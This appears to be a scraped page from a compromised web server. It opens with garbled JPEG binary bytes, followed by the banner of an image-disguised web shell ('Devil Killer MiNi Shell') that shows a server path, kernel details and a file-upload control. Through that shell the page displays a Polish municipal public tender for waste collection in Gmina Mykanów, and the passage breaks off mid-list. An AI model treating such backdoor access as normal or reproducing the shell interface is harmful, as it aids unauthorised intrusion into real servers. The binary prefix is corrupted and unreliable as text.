JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231229/0057979101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odbiór i zagospodarowanie odpadów z nieruchomości niezamieszkałych na terenie Gminy Mykanów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mykanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398110</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Samorządowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mykanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mykanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mykanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odbiór i zagospodarowanie odpadów z nieruchomości niezamieszkałych na terenie Gminy Mykanów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3daab401-a63c-11ee-948d-82b0c04ef850</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00579791</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00003126/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Odbiór i zagospodarowanie odpadów z nieruchomości komunalnych w 2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mykanow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mykanow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem https://platformazakupowa.pl/ pod adresem:<br/>https://platformazakupowa.pl/pn/mykanow/proceedings<br/>Zamawiający informuje, że instrukcje korzystania z https://platformazakupowa.pl/ dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu https://platformazakupowa.pl/<br/>znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>4)Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i<br/>otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca,<br/>będzie przekazywana w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/ do<br/>konkretnego wykonawcy.<br/>7) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na https://platformazakupowa.pl/ ,tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 104, Linux,<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na https://platformazakupowa.pl/ odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>11) Zamawiający wymaga, by formaty dokumentów sporządzanych przez Wykonawcę były zgodne z<br/>załącznikiem nr 2 do rozporządzenia Rady Ministrów w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych i<br/>jednocześnie rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf<br/>12) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów:<br/>a) .zip<br/>b) .7Z<br/>13) Wśród formatów powszechnych a NIE występujących w rozporządzeniu<br/>występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za<br/>złożone nieskutecznie.<br/>14) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym,<br/>który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi max 5MB.<br/>15) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PadES.<br/>16) Pliki w innych formatach niż PDF zaleca się opatrzyć Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie<br/>z dokumentem podpisywanym.19) Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy w Mykanowie<br/>jest Wójt Gminy Mykanów z siedzibą: ul. Samorządowa 1, 42‑233 Mykanów;<br/>2) we wszystkich sprawach związanych z przetwarzaniem udostępnionych danych osobowych może się Pani/Pan kontaktować z<br/>Inspektorem Ochrony Danych Gminy Mykanów pod adresem e‑mail:<br/>ewa.olejarz@mykanow.pl lub na adres siedziby Urzędu Gminy w Mykanowie ul. Samorządowa 1 42-<br/>233 Mykanów;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>przetargu nieograniczonego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. -<br/>Prawo zamówień publicznych (dalej ustawy Pzp) oraz podmioty uprawnione do ich przetwarzania na<br/>podstawie przepisów prawa;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane będą następnie<br/>przechowywane w celach archiwalnych, przez okres, który wyznaczony zostanie przede wszystkim na<br/>podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych<br/>rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów<br/>zakładowych, chyba, że przepisy szczególne stanowią inaczej;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany i nie będą profilowane;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) Obowiązek informacyjny określony przepisami RODO spoczywa także na Wykonawcach, którzy pozuskują dane osobowe osób trzecich w celu przekazania ich Zamawiającemu w ofertach. Dla uzyskania przez Zamawiającego potwierdzenia, że osoby, których dane osobowe są przekazywane Zamawiającemu, dysponują już wskazanymi informacjami, jak również w celu właściwego zabezpieczenia i ochrony danych tych osób, z których Wykonawca będzie korzystał, przekazanych<br/>przez Wykonawcę w ofercie celem uzyskania przedmiotowego zamówienia publicznego wymagane jest oświadczenie Wykonawcy dotyczące pozyskania przez Wykonawcę danych osobowych od osób<br/>trzecich, które zawarte jest w formularzu oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKZ.271.30.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Odbiór i zagospodarowanie odpadów komunalnych z budynków komunalnych oraz innych nieruchomości będących w zarządzie Gminy Mykanów.<br/>Zakres robót obejmuje wywóz nieczystości z następujących miejsc:<br/><br/>1)	Budynek Urzędu Gminy Mykanów przy ul. Samorządowej 1 w Mykanowie: <br/>•	Pojemniki o pojemności 1100 l – 11 szt. na odpady zmieszane plus 4 pojemniki x 1100 l na odpady segregowane w tym 2 na tworzywa sztuczne, 1 na szkło, 1 sztuka na papier; <br/>•	ilość wywozów 12;<br/>2)	Targowisko przy ul. Słonecznej w Mykanowie:<br/>•	pojemnik o pojemności 1100 l – 2 szt. odpady zmieszane plus 1 sztuka 1100 na tworzywa sztuczne, 1 sztuka 240 l na szkło, 1 sztuka 1100 l na papier;<br/>•	ilość wywozów 12;<br/>3)	Świetlica wiejska w Kokawie przy ul. Kopernika:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane plus 1 sztuka pojemnik 240 l na tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>4)	Świetlica wiejska w Rybnej przy ul. Głównej: <br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane plus 1 szt. 240 l na tworzywa sztuczne;<br/>•	ilość wywozów 12;<br/>5)	Świetlica wiejska w Starym Kocinie przy ul. Krętej:<br/>•	pojemnik o pojemności 240 l - 1 szt. odpady zmieszane;<br/>• ilość wywozów 12;<br/>6)	Świetlica wiejska w Cykarzewie Północnym przy ul. Rumiankowej:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane; <br/>•	ilość wywozów 12;<br/>7)	Świetlica wiejska w Starym Broniszewie przy ul. Kwiatowej:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane plus jeden pojemnik 240 l na odpady segregowane – tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>8)	Świetlica wiejska w Jamnie przy ul. Kruszyńskiej:<br/>•	pojemnik o pojemności 1100 l na odpady zmieszane – 1 szt. plus 1 pojemnik 1100 l na odpady segregowane – tworzywa sztuczne; <br/>• ilość wywozów 12;<br/>9)	Świetlica wiejska w Grabówce przy ul. Cichej: <br/>•	pojemnik o pojemności 240 l – 2 szt. na odpady zmieszane i 1 szt. pojemnik 240 l na odpady segregowane – tworzywa sztuczne;<br/>•	ilość wywozów 12;<br/>10)	Świetlica wiejska w Grabowej przy ul. Długosza:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane plus 1 pojemnik 240 l na tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>11)	Świetlica wiejska w Borownie przy ul. Strażackiej:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane, plus jeden pojemnik 240 l na odpady segregowane – tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>12) Centrum muzyki i tańca - świetlica wiejska w Mykanowie przy ul. Częstochowskiej:<br/>•	pojemnik o pojemności 1100 l na odpady zmieszane – 1 szt. plus 1 szt. pojemnik 1100 l na odpady segregowane – tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>13)	Remiza OSP w Lubojnie przy ul. Strażackiej:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane;<br/>•	ilość wywozów 12;<br/>14)	Remiza OSP w Starym Cykarzewie przy ul. Częstochowskiej:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane;<br/>•	ilość wywozów 12;<br/>15)	Remiza OSP w Borownie przy ul. Strażackiej: <br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane;<br/>•	ilość wywozów 12;<br/>16)	Świetlica wiejska w Lubojence przy ul. Głównej 1:<br/>•	pojemnik o pojemności 240 l na odpady zmieszane – 1 szt. plus 1 pojemnik 240 l na odpady segregowane – tworzywa sztuczne;<br/>•	ilość wywozów 12;<br/>17)	Świetlica wiejska w Czarnym Lesie przy ul. Częstochowskiej:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane plus 1 pojemnik 240 l na odpady segregowane – tworzywa sztuczne;<br/>•	ilość wywozów 12;<br/>18)	Dom Ludowy w Wierzchowisku przy ul. Długiej 145:<br/>•	pojemnik o pojemności 240 l na odpady zmieszane – 1 szt. plus 1 pojemnik 240 l na odpady segregowane – tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>19)	Dom Ludowy w Woli Hankowskiej przy ul. Dworskiej:<br/>•	pojemnik o pojemności 1100 l na odpady zmieszane – 1 sztuka plus jeden pojemnik 240 l na odpady segregowane – tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>20)	Boisko sportowe w Cykarzewie Północnym przy ul. Rumiankowej:<br/>•	pojemnik o pojemności 240 l na odpady zmieszane – 1 szt. plus jeden pojemnik 240 l na odpady segregowane – tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>21)	Boisko sportowe w Czarnym Lesie przy ul. Szkolnej:<br/>•	pojemnik o pojemności 240 l na odpady zmieszane – 1 szt. plus 1 pojemnik 240 l na odpady segregowane – tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>22)	Plac zabaw w Kuźnicy Lechowej przy ul. Długiej:<br/>•	pojemnik o pojemności 240 l - 1 szt. odpady zmieszane; <br/>•	ilość wywozów 12;<br/>23)	Plac zabaw w Nowym Kocinie przy ul. Prostej: <br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane plus 1 pojemnik 240 l na tworzywa sztuczne; <br/>•	ilość wywozów 12;<br/>24)	Remiza OSP Radostków przy ul. Wesołej: <br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane; <br/>•	ilość wywozów 12;<br/>25)	Remiza OSP Kuźnica Kiedrzyńska przy ul. Witosa:<br/>•	pojemnik o pojemności 240 l – 1 szt. odpady zmieszane; <br/>•	ilość wywozów 12;<br/>26)	Plac wiejski Stary Broniszew przy ul. Kwiatowej 25/27:<br/>• pojemnik o pojemności 240 l na odpady zmieszane;<br/>• ilość wywozów 12;<br/>27)	Pawilon wystawienniczy w Borownie przy ul. Ogrodowej 11: <br/>• pojemnik o pojemności 240 l odpady zmieszane; <br/>• ilość wywozów 12;<br/>28)	Hala sportowa w Mykanowie przy ul. Słonecznej:<br/>• pojemniki o pojemności 1100 l na odpady zmieszane – 2 szt. plus 1 pojemnik 1100 l na odpady segregowane tworzywa sztuczne, 1 pojemnik 240 l na szkło, 1 pojemnik 240 l na papier;<br/>• ilość wywozów 12;<br/>29) Plac zabaw w Łochyni przy ul. Akacjowej 16:<br/>• pojemnik o pojemności 240 l na odpady zmieszane;<br/>• ilość wywozów 12;<br/>30) Plac zabaw w Czarnym Lesie przy ul. Szkolnej: <br/>•	pojemnik o pojemności 240 l na odpady zmieszane plus 1 pojemnik 240 l na odpady segregowane - tworzywa sztuczne;<br/>•	Ilość wywozów 12;<br/>31) Plac wiejski w Starym Cykarzewie przy ul. Kolejowej: <br/>•	pojemnik o pojemności 240 l na odpady zmieszane; <br/>•	Ilość wywozów 12.<br/><br/>2. Zakres zamówienia obejmuje również odbiór i zagospodarowanie odpadów z placówek oświatowych z terenu Gminy Mykanów<br/>1) Szkoła Podstawowa w Starym Broniszewie, Stary Broniszew, ul. Kwiatowa 28: <br/>•	dwa pojemniki 240 l na odpady zmieszane; <br/>•	jeden pojemnik 240 l na odpady segregowane – tworzywa sztuczne; <br/>•	jeden pojemnik 120 l na odpady segregowane – szkło; <br/>• jeden pojemniki 240 l na odpady segregowane – papier; <br/>Ilość wywozów: 12. <br/>2) Szkoła Podstawowa im. Wołyńskiej Brygady Kawalerii w Starym Kocinie, Stary Kocin, ul. Kręta 91:<br/>•	jeden pojemnik na odpady zmieszane –1100 l; <br/>•	jeden pojemnik 1100 l na odpady segregowane – tworzywa sztuczne;<br/>•	jeden pojemnik 120 l na odpady segregowane – szkło; <br/>•	jeden pojemniki 1100 l na odpady segregowane – papier ; <br/>•	jeden pojemnik 1100 l na odpady bio;<br/>Ilość wywozów: 12, a pojemnik bio od kwietnia do października – 7 razy.<br/>3) Szkoła Podstawowa im. Marcina Kacprzaka, Stary Cykarzew, ul. Szkolna 12:<br/>•	dwa pojemniki na odpady zmieszane – 1100 l; <br/>•	jeden pojemniki 240 l na odpady segregowane – tworzywa sztuczne;<br/>•	jeden pojemnik 120 l na odpady segregowane – szkło; <br/>•	jeden pojemniki 120 l na odpady segregowane – papier ,<br/>•	jeden pojemnik 1100 l na odpady bio;<br/>Ilość wywozów: 12, a pojemnik bio od kwietnia do października – 7 razy.<br/>4) Szkoła Podstawowa im. Jana Kochanowskiego w Czarnym Lesie, Czarny Las ul. Szkolna 6<br/>•	trzy pojemniki na odpady zmieszane – 1100 l ;<br/>•	dwa pojemniki 1100 l na odpady segregowane – tworzywa sztuczne;<br/>•	jeden pojemnik 240 l na odpady segregowane – szkło; <br/>•	jeden pojemniki 240 l na odpady segregowane – papier,<br/>•	jeden pojemnik 1100 na odpady bio;<br/>Ilość wywozów: 12, a pojemnik bio od kwietnia do października – 7 razy.<br/><br/>5) Zespół Szkolno-Przedszkolny w Borownie, Borowno, ul. Klonowa 6/8:<br/>•	pojemniki na odpady zmieszane - trzy po 1100 l;<br/>•	jeden pojemnik 1100 l na odpady segregowane tworzywa sztuczne; <br/>•	jeden pojemnik 1100 l na odpady segregowane – papier;<br/>• jeden pojemnik 1100 l na odpady segregowane – szkło<br/>Ilość wywozów: 12.<br/>6 ) Zespół Szkolno-Przedszkolny w Lubojnie, Lubojna, ul. Strażacka 21:<br/>•	pojemniki na odpady zmieszane – trzy po 1100 l plus dwa po 240 l; <br/>•	dwa pojemniki 240 l na odpady segregowane – tworzywa sztuczne; <br/>•	dwa pojemniki 240 l na odpady segregowane – papier;<br/>Ilość wywozów: 12. <br/>7) Zespół 